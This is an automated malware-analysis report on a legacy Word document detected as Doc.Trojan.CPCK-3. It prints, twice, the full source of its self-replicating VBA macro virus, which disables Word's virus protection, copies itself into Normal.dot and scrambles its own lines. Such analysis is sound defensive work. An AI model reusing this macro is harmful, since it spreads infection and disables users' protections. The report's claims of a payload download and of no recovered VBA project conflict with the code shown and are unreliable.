Office (OLE) malware analysis — malicious · ce5a53b60c1b3128

MALICIOUS

Office (OLE)

50.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 703de6625e6b75ea7060b2c796302d22 SHA-1: 28c0ce600ff374eb1a84c61e5acfb30a64bd4add SHA-256: ce5a53b60c1b3128ca3d69af5af516a479a097b17475ab2dcce26cfc10e6c042

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro that is triggered by the AutoClose event. This macro is designed to obfuscate its actions and likely downloads and executes a second-stage payload, as indicated by the ClamAV detection and the presence of a macro that manipulates code modules. The document body itself contains generic text unrelated to the malicious functionality.

Heuristics 4

ClamAV: Doc.Trojan.CPCK-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.CPCK-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2006 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2006 bytes
SHA-256: `403231ea78821944b523223386feb47440b07aae132a0fe48ad26ad43608bd4f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Close() PLM = GGR + AQR On Error Resume Next PAJ = SRI + VTB Application.EnableCancelKey = 0 UIL = QBN + KGN KC7 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines OFG = SSM + VUE Options.SaveNormalPrompt = 0 PVF = LCV + OAM VR71 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines CCR = GBG + IGU Options.VirusProtection = 0 VIG = DDO + JJP Options.ConfirmConversions = 0 HNE = EMB + KTF If KC7 > 0 And VR71 > 0 Then GoTo LE96 RIG = UNN + JCM If KC7 = 0 Then PUS = ALU + JOL Set VL56 = ActiveDocument.VBProject.VBComponents.Item(1) LKH = IFB + FVB SF81 = True IIK = DKF + NLD End If UOL = ICR + KQN If VR71 = 0 Then SAE = BCH + CAL Set VL56 = NormalTemplate.VBProject.VBComponents.Item(1) OLS = BEO + JHD UL53 = True PUL = BQI + KKE End If HCM = DUC + JGT If UL53 <> True And SF81 <> True Then GoTo LE96 QGO = FBA + HRG If UL53 = True Then VL56.CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, KC7 - 1)) FKF = HAK + ETM If SF81 = True Then VL56.CodeModule.AddFromString ("Sub Document_Close()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, VR71 - 1)) QUH = LBN + JVC With VL56.CodeModule UNH = DKE + VCA For x = 2 To (VL56.CodeModule.CountOfLines - 1) Step 2 HMU = LIS + SOP .replaceline x, (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " = " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " + " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) VHK = JPD + JLR Next x LJL = FNK + OTI End With GGD = LEM + HTK LE96: EPQ = NRD + REV End Sub

SHA-256: 403231ea78821944b523223386feb47440b07aae132a0fe48ad26ad43608bd4f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
PLM = GGR + AQR
On Error Resume Next
PAJ = SRI + VTB
Application.EnableCancelKey = 0
UIL = QBN + KGN
KC7 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
OFG = SSM + VUE
Options.SaveNormalPrompt = 0
PVF = LCV + OAM
VR71 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
CCR = GBG + IGU
Options.VirusProtection = 0
VIG = DDO + JJP
Options.ConfirmConversions = 0
HNE = EMB + KTF
If KC7 > 0 And VR71 > 0 Then GoTo LE96
RIG = UNN + JCM
If KC7 = 0 Then
PUS = ALU + JOL
Set VL56 = ActiveDocument.VBProject.VBComponents.Item(1)
LKH = IFB + FVB
SF81 = True
IIK = DKF + NLD
End If
UOL = ICR + KQN
If VR71 = 0 Then
SAE = BCH + CAL
Set VL56 = NormalTemplate.VBProject.VBComponents.Item(1)
OLS = BEO + JHD
UL53 = True
PUL = BQI + KKE
End If
HCM = DUC + JGT
If UL53 <> True And SF81 <> True Then GoTo LE96
QGO = FBA + HRG
If UL53 = True Then VL56.CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, KC7 - 1))
FKF = HAK + ETM
If SF81 = True Then VL56.CodeModule.AddFromString ("Sub Document_Close()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, VR71 - 1))
QUH = LBN + JVC
With VL56.CodeModule
UNH = DKE + VCA
For x = 2 To (VL56.CodeModule.CountOfLines - 1) Step 2
HMU = LIS + SOP
.replaceline x, (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " = " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " + " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22)))
VHK = JPD + JLR
Next x
LJL = FNK + OTI
End With
GGD = LEM + HTK
LE96:
EPQ = NRD + REV
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.